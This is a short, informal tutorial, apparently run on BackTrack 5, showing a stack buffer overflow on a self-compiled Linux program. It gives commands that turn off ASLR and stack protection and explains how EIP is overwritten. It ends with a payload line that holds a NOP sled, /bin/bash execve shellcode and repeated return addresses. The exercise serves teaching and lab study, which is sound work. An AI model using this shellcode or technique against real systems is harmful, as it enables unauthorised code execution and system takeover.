Exploitation Linux In BT 5 r1

Exploit linux
before we start we should pray that facilitated the exploitation of linux
hehehehehe….
:)
we start from the beginning of the story of exploitation linux and go directly to the TKP!
hehehehe ...
:)

Okay we first open a terminal and run the following command

root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space

And shown in the picture below

Then we create a file with extension C that uses the language C + + and it looks like the picture below

The next compile the script to trigger a buffer overflow

Next we use a protection technique called "stack-smashing protection" and is used to detect buffer overflow the stack before the malicious code is executed.
We can change the SSP off by adding "-fno-stack-protector" flag to gcc when compiling.
then we send a character as much as 505 but still not teroverwrite then we send as much as 508 characters we can see EIP  in it is 0x41414141 as shown in the picture below 

then we can see if the value of EBP and EIP has overwritted. Next, we examine a specific register ESP as shown below

Then we try to find out the address of the ESP and reduce the 200 bytes of it.
The next, we subtract 200 from ESP. ESP is in bffff16c address, then we will get the result: 0xbffff16c - 200 = 0xbfffef6c to calculate these values ​​we can use the application Kcalc

The next and generate shellcode.

run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')

Exploitation succes....
:)